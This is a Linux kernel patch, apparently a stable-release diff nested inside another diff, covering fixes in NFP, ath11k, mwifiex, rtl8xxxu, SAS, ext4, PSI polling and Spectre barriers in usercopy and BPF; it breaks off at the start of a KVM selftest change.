+diff --git a/drivers/net/ethernet/netronome/nfp/nfp_port.h b/drivers/net/ethernet/netronome/nfp/nfp_port.h
+index 6793cdf9ff115..c31812287ded1 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfp_port.h
++++ b/drivers/net/ethernet/netronome/nfp/nfp_port.h
+@@ -38,6 +38,16 @@ enum nfp_port_flags {
+ 	NFP_PORT_CHANGED = 0,
+ };
+ 
++enum {
++	NFP_SPEED_1G,
++	NFP_SPEED_10G,
++	NFP_SPEED_25G,
++	NFP_SPEED_40G,
++	NFP_SPEED_50G,
++	NFP_SPEED_100G,
++	NFP_SUP_SPEED_NUMBER
++};
++
+ /**
+  * struct nfp_port - structure representing NFP port
+  * @netdev:	backpointer to associated netdev
+@@ -52,6 +62,7 @@ enum nfp_port_flags {
+  * @eth_forced:	for %NFP_PORT_PHYS_PORT port is forced UP or DOWN, don't change
+  * @eth_port:	for %NFP_PORT_PHYS_PORT translated ETH Table port entry
+  * @eth_stats:	for %NFP_PORT_PHYS_PORT MAC stats if available
++ * @speed_bitmap:	for %NFP_PORT_PHYS_PORT supported speed bitmap
+  * @pf_id:	for %NFP_PORT_PF_PORT, %NFP_PORT_VF_PORT ID of the PCI PF (0-3)
+  * @vf_id:	for %NFP_PORT_VF_PORT ID of the PCI VF within @pf_id
+  * @pf_split:	for %NFP_PORT_PF_PORT %true if PCI PF has more than one vNIC
+@@ -78,6 +89,7 @@ struct nfp_port {
+ 			bool eth_forced;
+ 			struct nfp_eth_table_port *eth_port;
+ 			u8 __iomem *eth_stats;
++			DECLARE_BITMAP(speed_bitmap, NFP_SUP_SPEED_NUMBER);
+ 		};
+ 		/* NFP_PORT_PF_PORT, NFP_PORT_VF_PORT */
+ 		struct {
+diff --git a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c
+index 730fea214b8ab..7136bc48530ba 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c
++++ b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.c
+@@ -100,6 +100,7 @@ enum nfp_nsp_cmd {
+ 	SPCODE_FW_LOADED	= 19, /* Is application firmware loaded */
+ 	SPCODE_VERSIONS		= 21, /* Report FW versions */
+ 	SPCODE_READ_SFF_EEPROM	= 22, /* Read module EEPROM */
++	SPCODE_READ_MEDIA	= 23, /* Get either the supported or advertised media for a port */
+ };
+ 
+ struct nfp_nsp_dma_buf {
+@@ -1100,4 +1101,20 @@ int nfp_nsp_read_module_eeprom(struct nfp_nsp *state, int eth_index,
+ 	kfree(buf);
+ 
+ 	return ret;
++};
++
++int nfp_nsp_read_media(struct nfp_nsp *state, void *buf, unsigned int size)
++{
++	struct nfp_nsp_command_buf_arg media = {
++		{
++			.code		= SPCODE_READ_MEDIA,
++			.option		= size,
++		},
++		.in_buf		= buf,
++		.in_size	= size,
++		.out_buf	= buf,
++		.out_size	= size,
++	};
++
++	return nfp_nsp_command_buf(state, &media);
+ }
+diff --git a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.h b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.h
+index 992d72ac98d38..8f5cab0032d08 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.h
++++ b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp.h
+@@ -65,6 +65,11 @@ static inline bool nfp_nsp_has_read_module_eeprom(struct nfp_nsp *state)
+ 	return nfp_nsp_get_abi_ver_minor(state) > 28;
+ }
+ 
++static inline bool nfp_nsp_has_read_media(struct nfp_nsp *state)
++{
++	return nfp_nsp_get_abi_ver_minor(state) > 33;
++}
++
+ enum nfp_eth_interface {
+ 	NFP_INTERFACE_NONE	= 0,
+ 	NFP_INTERFACE_SFP	= 1,
+@@ -97,6 +102,47 @@ enum nfp_eth_fec {
+ 	NFP_FEC_DISABLED_BIT,
+ };
+ 
++/* link modes about RJ45 haven't been used, so there's no mapping to them */
++enum nfp_ethtool_link_mode_list {
++	NFP_MEDIA_W0_RJ45_10M,
++	NFP_MEDIA_W0_RJ45_10M_HD,
++	NFP_MEDIA_W0_RJ45_100M,
++	NFP_MEDIA_W0_RJ45_100M_HD,
++	NFP_MEDIA_W0_RJ45_1G,
++	NFP_MEDIA_W0_RJ45_2P5G,
++	NFP_MEDIA_W0_RJ45_5G,
++	NFP_MEDIA_W0_RJ45_10G,
++	NFP_MEDIA_1000BASE_CX,
++	NFP_MEDIA_1000BASE_KX,
++	NFP_MEDIA_10GBASE_KX4,
++	NFP_MEDIA_10GBASE_KR,
++	NFP_MEDIA_10GBASE_CX4,
++	NFP_MEDIA_10GBASE_CR,
++	NFP_MEDIA_10GBASE_SR,
++	NFP_MEDIA_10GBASE_ER,
++	NFP_MEDIA_25GBASE_KR,
++	NFP_MEDIA_25GBASE_KR_S,
++	NFP_MEDIA_25GBASE_CR,
++	NFP_MEDIA_25GBASE_CR_S,
++	NFP_MEDIA_25GBASE_SR,
++	NFP_MEDIA_40GBASE_CR4,
++	NFP_MEDIA_40GBASE_KR4,
++	NFP_MEDIA_40GBASE_SR4,
++	NFP_MEDIA_40GBASE_LR4,
++	NFP_MEDIA_50GBASE_KR,
++	NFP_MEDIA_50GBASE_SR,
++	NFP_MEDIA_50GBASE_CR,
++	NFP_MEDIA_50GBASE_LR,
++	NFP_MEDIA_50GBASE_ER,
++	NFP_MEDIA_50GBASE_FR,
++	NFP_MEDIA_100GBASE_KR4,
++	NFP_MEDIA_100GBASE_SR4,
++	NFP_MEDIA_100GBASE_CR4,
++	NFP_MEDIA_100GBASE_KP4,
++	NFP_MEDIA_100GBASE_CR10,
++	NFP_MEDIA_LINK_MODES_NUMBER
++};
++
+ #define NFP_FEC_AUTO		BIT(NFP_FEC_AUTO_BIT)
+ #define NFP_FEC_BASER		BIT(NFP_FEC_BASER_BIT)
+ #define NFP_FEC_REED_SOLOMON	BIT(NFP_FEC_REED_SOLOMON_BIT)
+@@ -256,6 +302,16 @@ enum nfp_nsp_sensor_id {
+ int nfp_hwmon_read_sensor(struct nfp_cpp *cpp, enum nfp_nsp_sensor_id id,
+ 			  long *val);
+ 
++struct nfp_eth_media_buf {
++	u8 eth_index;
++	u8 reserved[7];
++	__le64 supported_modes[2];
++	__le64 advertised_modes[2];
++};
++
++int nfp_nsp_read_media(struct nfp_nsp *state, void *buf, unsigned int size);
++int nfp_eth_read_media(struct nfp_cpp *cpp, struct nfp_eth_media_buf *ethm);
++
+ #define NFP_NSP_VERSION_BUFSZ	1024 /* reasonable size, not in the ABI */
+ 
+ enum nfp_nsp_versions {
+diff --git a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp_eth.c b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp_eth.c
+index bb64efec4c46b..570ac1bb2122f 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp_eth.c
++++ b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp_nsp_eth.c
+@@ -647,3 +647,29 @@ int __nfp_eth_set_split(struct nfp_nsp *nsp, unsigned int lanes)
+ 	return NFP_ETH_SET_BIT_CONFIG(nsp, NSP_ETH_RAW_PORT, NSP_ETH_PORT_LANES,
+ 				      lanes, NSP_ETH_CTRL_SET_LANES);
+ }
++
++int nfp_eth_read_media(struct nfp_cpp *cpp, struct nfp_eth_media_buf *ethm)
++{
++	struct nfp_nsp *nsp;
++	int ret;
++
++	nsp = nfp_nsp_open(cpp);
++	if (IS_ERR(nsp)) {
++		nfp_err(cpp, "Failed to access the NSP: %pe\n", nsp);
++		return PTR_ERR(nsp);
++	}
++
++	if (!nfp_nsp_has_read_media(nsp)) {
++		nfp_warn(cpp, "Reading media link modes not supported. Please update flash\n");
++		ret = -EOPNOTSUPP;
++		goto exit_close_nsp;
++	}
++
++	ret = nfp_nsp_read_media(nsp, ethm, sizeof(*ethm));
++	if (ret)
++		nfp_err(cpp, "Reading media link modes failed: %pe\n", ERR_PTR(ret));
++
++exit_close_nsp:
++	nfp_nsp_close(nsp);
++	return ret;
++}
+diff --git a/drivers/net/wireless/ath/ath11k/qmi.c b/drivers/net/wireless/ath/ath11k/qmi.c
+index 7cc5fa3251521..381c6b390dd78 100644
+--- a/drivers/net/wireless/ath/ath11k/qmi.c
++++ b/drivers/net/wireless/ath/ath11k/qmi.c
+@@ -1964,7 +1964,7 @@ static void ath11k_qmi_free_target_mem_chunk(struct ath11k_base *ab)
+ 			continue;
+ 
+ 		dma_free_coherent(ab->dev,
+-				  ab->qmi.target_mem[i].size,
++				  ab->qmi.target_mem[i].prev_size,
+ 				  ab->qmi.target_mem[i].vaddr,
+ 				  ab->qmi.target_mem[i].paddr);
+ 		ab->qmi.target_mem[i].vaddr = NULL;
+@@ -1985,12 +1985,12 @@ static int ath11k_qmi_alloc_target_mem_chunk(struct ath11k_base *ab)
+ 		 * in such case, no need to allocate memory for FW again.
+ 		 */
+ 		if (chunk->vaddr) {
+-			if (chunk->prev_type == chunk->type ||
++			if (chunk->prev_type == chunk->type &&
+ 			    chunk->prev_size == chunk->size)
+ 				continue;
+ 
+ 			/* cannot reuse the existing chunk */
+-			dma_free_coherent(ab->dev, chunk->size,
++			dma_free_coherent(ab->dev, chunk->prev_size,
+ 					  chunk->vaddr, chunk->paddr);
+ 			chunk->vaddr = NULL;
+ 		}
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
+index b8dc3b5c9ad94..9f506efa53705 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -480,6 +480,7 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ };
+ 
+ static const struct of_device_id mwifiex_sdio_of_match_table[] = {
++	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
+ 	{ .compatible = "marvell,sd8997" },
+ 	{ }
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index e9c1b62c9c3c2..e445084e358f9 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -4389,12 +4389,9 @@ void rtl8xxxu_gen1_report_connect(struct rtl8xxxu_priv *priv,
+ void rtl8xxxu_gen2_report_connect(struct rtl8xxxu_priv *priv,
+ 				  u8 macid, bool connect)
+ {
+-#ifdef RTL8XXXU_GEN2_REPORT_CONNECT
+ 	/*
+-	 * Barry Day reports this causes issues with 8192eu and 8723bu
+-	 * devices reconnecting. The reason for this is unclear, but
+-	 * until it is better understood, leave the code in place but
+-	 * disabled, so it is not lost.
++	 * The firmware turns on the rate control when it knows it's
++	 * connected to a network.
+ 	 */
+ 	struct h2c_cmd h2c;
+ 
+@@ -4407,7 +4404,6 @@ void rtl8xxxu_gen2_report_connect(struct rtl8xxxu_priv *priv,
+ 		h2c.media_status_rpt.parm &= ~BIT(0);
+ 
+ 	rtl8xxxu_gen2_h2c_cmd(priv, &h2c, sizeof(h2c.media_status_rpt));
+-#endif
+ }
+ 
+ void rtl8xxxu_gen1_init_aggregation(struct rtl8xxxu_priv *priv)
+diff --git a/drivers/platform/x86/amd/pmf/Kconfig b/drivers/platform/x86/amd/pmf/Kconfig
+index c375498c40717..6d89528c31779 100644
+--- a/drivers/platform/x86/amd/pmf/Kconfig
++++ b/drivers/platform/x86/amd/pmf/Kconfig
+@@ -6,6 +6,7 @@
+ config AMD_PMF
+ 	tristate "AMD Platform Management Framework"
+ 	depends on ACPI && PCI
++	depends on POWER_SUPPLY
+ 	select ACPI_PLATFORM_PROFILE
+ 	help
+ 	  This driver provides support for the AMD Platform Management Framework.
+diff --git a/drivers/platform/x86/nvidia-wmi-ec-backlight.c b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+index baccdf6585382..1b572c90c76ec 100644
+--- a/drivers/platform/x86/nvidia-wmi-ec-backlight.c
++++ b/drivers/platform/x86/nvidia-wmi-ec-backlight.c
+@@ -12,6 +12,10 @@
+ #include <linux/wmi.h>
+ #include <acpi/video.h>
+ 
++static bool force;
++module_param(force, bool, 0444);
++MODULE_PARM_DESC(force, "Force loading (disable acpi_backlight=xxx checks");
++
+ /**
+  * wmi_brightness_notify() - helper function for calling WMI-wrapped ACPI method
+  * @w:    Pointer to the struct wmi_device identified by %WMI_BRIGHTNESS_GUID
+@@ -91,7 +95,7 @@ static int nvidia_wmi_ec_backlight_probe(struct wmi_device *wdev, const void *ct
+ 	int ret;
+ 
+ 	/* drivers/acpi/video_detect.c also checks that SOURCE == EC */
+-	if (acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
++	if (!force && acpi_video_get_backlight_type() != acpi_backlight_nvidia_wmi_ec)
+ 		return -ENODEV;
+ 
+ 	/*
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_main.c b/drivers/scsi/hisi_sas/hisi_sas_main.c
+index 02fa3c00dcccf..a8142e2b96435 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_main.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_main.c
+@@ -1708,13 +1708,15 @@ static int hisi_sas_debug_I_T_nexus_reset(struct domain_device *device)
+ 		return rc;
+ 	}
+ 
++	/* Remote phy */
+ 	if (rc)
+ 		return rc;
+ 
+-	/* Remote phy */
+ 	if (dev_is_sata(device)) {
+-		rc = sas_ata_wait_after_reset(device,
+-					HISI_SAS_WAIT_PHYUP_TIMEOUT);
++		struct ata_link *link = &device->sata_dev.ap->link;
++
++		rc = ata_wait_after_reset(link, HISI_SAS_WAIT_PHYUP_TIMEOUT,
++					  smp_ata_check_ready_type);
+ 	} else {
+ 		msleep(2000);
+ 	}
+diff --git a/drivers/scsi/libsas/sas_ata.c b/drivers/scsi/libsas/sas_ata.c
+index d35c9296f7388..2fd55ef9ffca5 100644
+--- a/drivers/scsi/libsas/sas_ata.c
++++ b/drivers/scsi/libsas/sas_ata.c
+@@ -287,6 +287,31 @@ static int sas_ata_clear_pending(struct domain_device *dev, struct ex_phy *phy)
+ 		return 1;
+ }
+ 
++int smp_ata_check_ready_type(struct ata_link *link)
++{
++	struct domain_device *dev = link->ap->private_data;
++	struct sas_phy *phy = sas_get_local_phy(dev);
++	struct domain_device *ex_dev = dev->parent;
++	enum sas_device_type type = SAS_PHY_UNUSED;
++	u8 sas_addr[SAS_ADDR_SIZE];
++	int res;
++
++	res = sas_get_phy_attached_dev(ex_dev, phy->number, sas_addr, &type);
++	sas_put_local_phy(phy);
++	if (res)
++		return res;
++
++	switch (type) {
++	case SAS_SATA_PENDING:
++		return 0;
++	case SAS_END_DEVICE:
++		return 1;
++	default:
++		return -ENODEV;
++	}
++}
++EXPORT_SYMBOL_GPL(smp_ata_check_ready_type);
++
+ static int smp_ata_check_ready(struct ata_link *link)
+ {
+ 	int res;
+diff --git a/drivers/scsi/libsas/sas_expander.c b/drivers/scsi/libsas/sas_expander.c
+index 5ce2518301040..63a23251fb1d8 100644
+--- a/drivers/scsi/libsas/sas_expander.c
++++ b/drivers/scsi/libsas/sas_expander.c
+@@ -1693,8 +1693,8 @@ static int sas_get_phy_change_count(struct domain_device *dev,
+ 	return res;
+ }
+ 
+-static int sas_get_phy_attached_dev(struct domain_device *dev, int phy_id,
+-				    u8 *sas_addr, enum sas_device_type *type)
++int sas_get_phy_attached_dev(struct domain_device *dev, int phy_id,
++			     u8 *sas_addr, enum sas_device_type *type)
+ {
+ 	int res;
+ 	struct smp_disc_resp *disc_resp;
+diff --git a/drivers/scsi/libsas/sas_internal.h b/drivers/scsi/libsas/sas_internal.h
+index 8d0ad3abc7b5c..a94bd0790b055 100644
+--- a/drivers/scsi/libsas/sas_internal.h
++++ b/drivers/scsi/libsas/sas_internal.h
+@@ -84,6 +84,8 @@ struct domain_device *sas_ex_to_ata(struct domain_device *ex_dev, int phy_id);
+ int sas_ex_phy_discover(struct domain_device *dev, int single);
+ int sas_get_report_phy_sata(struct domain_device *dev, int phy_id,
+ 			    struct smp_rps_resp *rps_resp);
++int sas_get_phy_attached_dev(struct domain_device *dev, int phy_id,
++			     u8 *sas_addr, enum sas_device_type *type);
+ int sas_try_ata_reset(struct asd_sas_phy *phy);
+ void sas_hae_reset(struct work_struct *work);
+ 
+diff --git a/drivers/spi/spi-mt65xx.c b/drivers/spi/spi-mt65xx.c
+index d6aff909fc365..9eab6c20dbc56 100644
+--- a/drivers/spi/spi-mt65xx.c
++++ b/drivers/spi/spi-mt65xx.c
+@@ -1192,11 +1192,6 @@ static int mtk_spi_probe(struct platform_device *pdev)
+ 	else
+ 		dma_set_max_seg_size(dev, SZ_256K);
+ 
+-	ret = devm_request_irq(dev, irq, mtk_spi_interrupt,
+-			       IRQF_TRIGGER_NONE, dev_name(dev), master);
+-	if (ret)
+-		return dev_err_probe(dev, ret, "failed to register irq\n");
+-
+ 	mdata->parent_clk = devm_clk_get(dev, "parent-clk");
+ 	if (IS_ERR(mdata->parent_clk))
+ 		return dev_err_probe(dev, PTR_ERR(mdata->parent_clk),
+@@ -1258,6 +1253,11 @@ static int mtk_spi_probe(struct platform_device *pdev)
+ 		dev_notice(dev, "SPI dma_set_mask(%d) failed, ret:%d\n",
+ 			   addr_bits, ret);
+ 
++	ret = devm_request_irq(dev, irq, mtk_spi_interrupt,
++			       IRQF_TRIGGER_NONE, dev_name(dev), master);
++	if (ret)
++		return dev_err_probe(dev, ret, "failed to register irq\n");
++
+ 	pm_runtime_enable(dev);
+ 
+ 	ret = devm_spi_register_master(dev, master);
+diff --git a/fs/ext4/sysfs.c b/fs/ext4/sysfs.c
+index d233c24ea3425..e2b8b3437c589 100644
+--- a/fs/ext4/sysfs.c
++++ b/fs/ext4/sysfs.c
+@@ -491,6 +491,11 @@ static void ext4_sb_release(struct kobject *kobj)
+ 	complete(&sbi->s_kobj_unregister);
+ }
+ 
++static void ext4_feat_release(struct kobject *kobj)
++{
++	kfree(kobj);
++}
++
+ static const struct sysfs_ops ext4_attr_ops = {
+ 	.show	= ext4_attr_show,
+ 	.store	= ext4_attr_store,
+@@ -505,7 +510,7 @@ static struct kobj_type ext4_sb_ktype = {
+ static struct kobj_type ext4_feat_ktype = {
+ 	.default_groups = ext4_feat_groups,
+ 	.sysfs_ops	= &ext4_attr_ops,
+-	.release	= (void (*)(struct kobject *))kfree,
++	.release	= ext4_feat_release,
+ };
+ 
+ void ext4_notify_error_sysfs(struct ext4_sb_info *sbi)
+diff --git a/include/asm-generic/vmlinux.lds.h b/include/asm-generic/vmlinux.lds.h
+index 3dc5824141cd2..7ad6f51b3d914 100644
+--- a/include/asm-generic/vmlinux.lds.h
++++ b/include/asm-generic/vmlinux.lds.h
+@@ -929,7 +929,12 @@
+ #define PRINTK_INDEX
+ #endif
+ 
++/*
++ * Discard .note.GNU-stack, which is emitted as PROGBITS by the compiler.
++ * Otherwise, the type of .notes section would become PROGBITS instead of NOTES.
++ */
+ #define NOTES								\
++	/DISCARD/ : { *(.note.GNU-stack) }				\
+ 	.notes : AT(ADDR(.notes) - LOAD_OFFSET) {			\
+ 		__start_notes = .;					\
+ 		KEEP(*(.note.*))					\
+diff --git a/include/linux/nospec.h b/include/linux/nospec.h
+index c1e79f72cd892..9f0af4f116d98 100644
+--- a/include/linux/nospec.h
++++ b/include/linux/nospec.h
+@@ -11,6 +11,10 @@
+ 
+ struct task_struct;
+ 
++#ifndef barrier_nospec
++# define barrier_nospec() do { } while (0)
++#endif
++
+ /**
+  * array_index_mask_nospec() - generate a ~0 mask when index < size, 0 otherwise
+  * @index: array element index
+diff --git a/include/linux/psi_types.h b/include/linux/psi_types.h
+index 6e43727350689..14a1ebb74e11f 100644
+--- a/include/linux/psi_types.h
++++ b/include/linux/psi_types.h
+@@ -177,6 +177,7 @@ struct psi_group {
+ 	struct timer_list poll_timer;
+ 	wait_queue_head_t poll_wait;
+ 	atomic_t poll_wakeup;
++	atomic_t poll_scheduled;
+ 
+ 	/* Protects data used by the monitor */
+ 	struct mutex trigger_lock;
+diff --git a/include/linux/random.h b/include/linux/random.h
+index bd954ecbef901..51133627ba73a 100644
+--- a/include/linux/random.h
++++ b/include/linux/random.h
+@@ -19,14 +19,14 @@ void add_input_randomness(unsigned int type, unsigned int code,
+ void add_interrupt_randomness(int irq) __latent_entropy;
+ void add_hwgenerator_randomness(const void *buf, size_t len, size_t entropy);
+ 
+-#if defined(LATENT_ENTROPY_PLUGIN) && !defined(__CHECKER__)
+ static inline void add_latent_entropy(void)
+ {
++#if defined(LATENT_ENTROPY_PLUGIN) && !defined(__CHECKER__)
+ 	add_device_randomness((const void *)&latent_entropy, sizeof(latent_entropy));
+-}
+ #else
+-static inline void add_latent_entropy(void) { }
++	add_device_randomness(NULL, 0);
+ #endif
++}
+ 
+ #if IS_ENABLED(CONFIG_VMGENID)
+ void add_vmfork_randomness(const void *unique_vm_id, size_t len);
+diff --git a/include/scsi/sas_ata.h b/include/scsi/sas_ata.h
+index a1df4f9d57a31..ec646217e7f6e 100644
+--- a/include/scsi/sas_ata.h
++++ b/include/scsi/sas_ata.h
+@@ -35,6 +35,7 @@ void sas_ata_end_eh(struct ata_port *ap);
+ int sas_execute_ata_cmd(struct domain_device *device, u8 *fis,
+ 			int force_phy_id);
+ int sas_ata_wait_after_reset(struct domain_device *dev, unsigned long deadline);
++int smp_ata_check_ready_type(struct ata_link *link);
+ #else
+ 
+ 
+@@ -98,6 +99,11 @@ static inline int sas_ata_wait_after_reset(struct domain_device *dev,
+ {
+ 	return -ETIMEDOUT;
+ }
++
++static inline int smp_ata_check_ready_type(struct ata_link *link)
++{
++	return 0;
++}
+ #endif
+ 
+ #endif /* _SAS_ATA_H_ */
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index 17ab3e15ac25f..211f63e87c637 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -34,6 +34,7 @@
+ #include <linux/log2.h>
+ #include <linux/bpf_verifier.h>
+ #include <linux/nodemask.h>
++#include <linux/nospec.h>
+ 
+ #include <asm/barrier.h>
+ #include <asm/unaligned.h>
+@@ -1908,9 +1909,7 @@ out:
+ 		 * reuse preexisting logic from Spectre v1 mitigation that
+ 		 * happens to produce the required code on x86 for v4 as well.
+ 		 */
+-#ifdef CONFIG_X86
+ 		barrier_nospec();
+-#endif
+ 		CONT;
+ #define LDST(SIZEOP, SIZE)						\
+ 	STX_MEM_##SIZEOP:						\
+diff --git a/kernel/sched/psi.c b/kernel/sched/psi.c
+index 48fedeee15c5b..e83c321461cf4 100644
+--- a/kernel/sched/psi.c
++++ b/kernel/sched/psi.c
+@@ -189,6 +189,7 @@ static void group_init(struct psi_group *group)
+ 	INIT_DELAYED_WORK(&group->avgs_work, psi_avgs_work);
+ 	mutex_init(&group->avgs_lock);
+ 	/* Init trigger-related members */
++	atomic_set(&group->poll_scheduled, 0);
+ 	mutex_init(&group->trigger_lock);
+ 	INIT_LIST_HEAD(&group->triggers);
+ 	group->poll_min_period = U32_MAX;
+@@ -565,18 +566,17 @@ static u64 update_triggers(struct psi_group *group, u64 now)
+ 	return now + group->poll_min_period;
+ }
+ 
+-/* Schedule polling if it's not already scheduled. */
+-static void psi_schedule_poll_work(struct psi_group *group, unsigned long delay)
++/* Schedule polling if it's not already scheduled or forced. */
++static void psi_schedule_poll_work(struct psi_group *group, unsigned long delay,
++				   bool force)
+ {
+ 	struct task_struct *task;
+ 
+ 	/*
+-	 * Do not reschedule if already scheduled.
+-	 * Possible race with a timer scheduled after this check but before
+-	 * mod_timer below can be tolerated because group->polling_next_update
+-	 * will keep updates on schedule.
++	 * atomic_xchg should be called even when !force to provide a
++	 * full memory barrier (see the comment inside psi_poll_work).
+ 	 */
+-	if (timer_pending(&group->poll_timer))
++	if (atomic_xchg(&group->poll_scheduled, 1) && !force)
+ 		return;
+ 
+ 	rcu_read_lock();
+@@ -588,12 +588,15 @@ static void psi_schedule_poll_work(struct psi_group *group, unsigned long delay)
+ 	 */
+ 	if (likely(task))
+ 		mod_timer(&group->poll_timer, jiffies + delay);
++	else
++		atomic_set(&group->poll_scheduled, 0);
+ 
+ 	rcu_read_unlock();
+ }
+ 
+ static void psi_poll_work(struct psi_group *group)
+ {
++	bool force_reschedule = false;
+ 	u32 changed_states;
+ 	u64 now;
+ 
+@@ -601,6 +604,43 @@ static void psi_poll_work(struct psi_group *group)
+ 
+ 	now = sched_clock();
+ 
++	if (now > group->polling_until) {
++		/*
++		 * We are either about to start or might stop polling if no
++		 * state change was recorded. Resetting poll_scheduled leaves
++		 * a small window for psi_group_change to sneak in and schedule
++		 * an immediate poll_work before we get to rescheduling. One
++		 * potential extra wakeup at the end of the polling window
++		 * should be negligible and polling_next_update still keeps
++		 * updates correctly on schedule.
++		 */
++		atomic_set(&group->poll_scheduled, 0);
++		/*
++		 * A task change can race with the poll worker that is supposed to
++		 * report on it. To avoid missing events, ensure ordering between
++		 * poll_scheduled and the task state accesses, such that if the poll
++		 * worker misses the state update, the task change is guaranteed to
++		 * reschedule the poll worker:
++		 *
++		 * poll worker:
++		 *   atomic_set(poll_scheduled, 0)
++		 *   smp_mb()
++		 *   LOAD states
++		 *
++		 * task change:
++		 *   STORE states
++		 *   if atomic_xchg(poll_scheduled, 1) == 0:
++		 *     schedule poll worker
++		 *
++		 * The atomic_xchg() implies a full barrier.
++		 */
++		smp_mb();
++	} else {
++		/* Polling window is not over, keep rescheduling */
++		force_reschedule = true;
++	}
++
++
+ 	collect_percpu_times(group, PSI_POLL, &changed_states);
+ 
+ 	if (changed_states & group->poll_states) {
+@@ -626,7 +666,8 @@ static void psi_poll_work(struct psi_group *group)
+ 		group->polling_next_update = update_triggers(group, now);
+ 
+ 	psi_schedule_poll_work(group,
+-		nsecs_to_jiffies(group->polling_next_update - now) + 1);
++		nsecs_to_jiffies(group->polling_next_update - now) + 1,
++		force_reschedule);
+ 
+ out:
+ 	mutex_unlock(&group->trigger_lock);
+@@ -787,7 +828,7 @@ static void psi_group_change(struct psi_group *group, int cpu,
+ 	write_seqcount_end(&groupc->seq);
+ 
+ 	if (state_mask & group->poll_states)
+-		psi_schedule_poll_work(group, 1);
++		psi_schedule_poll_work(group, 1, false);
+ 
+ 	if (wake_clock && !delayed_work_pending(&group->avgs_work))
+ 		schedule_delayed_work(&group->avgs_work, PSI_FREQ);
+@@ -941,7 +982,7 @@ void psi_account_irqtime(struct task_struct *task, u32 delta)
+ 		write_seqcount_end(&groupc->seq);
+ 
+ 		if (group->poll_states & (1 << PSI_IRQ_FULL))
+-			psi_schedule_poll_work(group, 1);
++			psi_schedule_poll_work(group, 1, false);
+ 	} while ((group = group->parent));
+ }
+ #endif
+@@ -1328,6 +1369,7 @@ void psi_trigger_destroy(struct psi_trigger *t)
+ 		 * can no longer be found through group->poll_task.
+ 		 */
+ 		kthread_stop(task_to_destroy);
++		atomic_set(&group->poll_scheduled, 0);
+ 	}
+ 	kfree(t);
+ }
+diff --git a/lib/usercopy.c b/lib/usercopy.c
+index 1505a52f23a01..d29fe29c68494 100644
+--- a/lib/usercopy.c
++++ b/lib/usercopy.c
+@@ -3,6 +3,7 @@
+ #include <linux/fault-inject-usercopy.h>
+ #include <linux/instrumented.h>
+ #include <linux/uaccess.h>
++#include <linux/nospec.h>
+ 
+ /* out-of-line parts */
+ 
+@@ -12,6 +13,12 @@ unsigned long _copy_from_user(void *to, const void __user *from, unsigned long n
+ 	unsigned long res = n;
+ 	might_fault();
+ 	if (!should_fail_usercopy() && likely(access_ok(from, n))) {
++		/*
++		 * Ensure that bad access_ok() speculation will not
++		 * lead to nasty side effects *after* the copy is
++		 * finished:
++		 */
++		barrier_nospec();
+ 		instrument_copy_from_user_before(to, from, n);
+ 		res = raw_copy_from_user(to, from, n);
+ 		instrument_copy_from_user_after(to, from, n, res);
+diff --git a/scripts/head-object-list.txt b/scripts/head-object-list.txt
+index b16326a92c458..b074134cfac21 100644
+--- a/scripts/head-object-list.txt
++++ b/scripts/head-object-list.txt
+@@ -15,7 +15,6 @@ arch/alpha/kernel/head.o
+ arch/arc/kernel/head.o
+ arch/arm/kernel/head-nommu.o
+ arch/arm/kernel/head.o
+-arch/arm64/kernel/head.o
+ arch/csky/kernel/head.o
+ arch/hexagon/kernel/head.o
+ arch/ia64/kernel/head.o
+@@ -39,7 +38,6 @@ arch/powerpc/kernel/entry_64.o
+ arch/powerpc/kernel/fpu.o
+ arch/powerpc/kernel/vector.o
+ arch/powerpc/kernel/prom_init.o
+-arch/riscv/kernel/head.o
+ arch/s390/kernel/head64.o
+ arch/sh/kernel/head_32.o
+ arch/sparc/kernel/head_32.o
+diff --git a/security/Kconfig.hardening b/security/Kconfig.hardening
+index 53baa95cb644f..0f295961e7736 100644
+--- a/security/Kconfig.hardening
++++ b/security/Kconfig.hardening
+@@ -281,6 +281,9 @@ endmenu
+ 
+ config CC_HAS_RANDSTRUCT
+ 	def_bool $(cc-option,-frandomize-layout-seed-file=/dev/null)
++	# Randstruct was first added in Clang 15, but it isn't safe to use until
++	# Clang 16 due to https://github.com/llvm/llvm-project/issues/60349
++	depends on !CC_IS_CLANG || CLANG_VERSION >= 160000
+ 
+ choice
+ 	prompt "Randomize layout of sensitive kernel structures"
+diff --git a/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c b/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c
+index 2a5727188c8d3..0668ec542cccd 100644
+--- a/tools/testing/selftests/kvm/x86_64/xen_shinfo_test.c
